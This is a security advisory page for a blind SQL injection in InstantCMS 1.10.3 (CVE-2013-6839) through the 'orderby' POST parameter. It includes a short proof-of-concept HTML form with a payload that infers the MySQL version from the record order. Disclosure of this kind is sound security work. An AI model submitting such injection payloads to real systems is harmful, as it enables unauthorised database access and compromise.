Lucene search
High-Tech BridgeHTB23185HistoryNov 20, 2013 - 12:00 a.m.
SQL Injection in InstantCMS
2013-11-2000:00:00
High-Tech Bridge
www.htbridge.com
27
0.003 Low
EPSS
Percentile
70.0%
High-Tech Bridge Security Research Lab discovered blind SQL injection vulnerability in InstantCMS, which can be exploited to perform SQL Injection attacks, alter SQL requests and compromise vulnerable application.
- SQL Injection in InstantCMS: CVE-2013-6839
The vulnerability exists due to insufficient filtration of “orderby” HTTP POST parameter passed to “/catalog/[id]” URL. A remote unauthenticated attacker can execute arbitrary SQL commands in application’s database.
Simple exploit code below uses blind SQL injection exploitation technique, and will display different order of records on the page if MySQL version is 5.:
<form action=“http://[host]/catalog/2” method=“post” name=“main”>
<input type=“hidden” name=“orderby” value="(-pubdate(substring(version(),1,1)=5))">
<input type=“hidden” name=“orderto” value=“asc”>
<input type=“submit” id=“btn”>
</form>
| CPE | Name | Operator | Version |
|---|---|---|---|
| instantcms | le | 1.10.3 |
Related
packetstorm
packetstorm
InstantCMS 1.10.3 SQL Injection
2013-12-12 00:00:00
cve
cve
CVE-2013-6839
2013-12-13 18:07:51
cvelist
cvelist
CVE-2013-6839
2013-12-13 15:00:00
nvd
nvd
CVE-2013-6839
2013-12-13 18:07:51
seebug
seebug
InstantCMS SQL注入漏洞
2013-12-16 00:00:00
zdt
zdt
InstantCMS 1.10.3 SQL Injection Vulnerability
2013-12-12 00:00:00
InstantCMS 1.10.3 - Blind SQL Injection
2013-12-17 00:00:00
exploitpack
exploitpack
InstantCMS 1.10.3 - Blind SQL Injection
2013-12-17 00:00:00
securityvulns
securityvulns
SQL Injection in InstantCMS
2014-01-09 00:00:00
prion
prion
Sql injection
2013-12-13 18:07:00
exploitdb
exploitdb
InstantCMS 1.10.3 - Blind SQL Injection
2013-12-17 00:00:00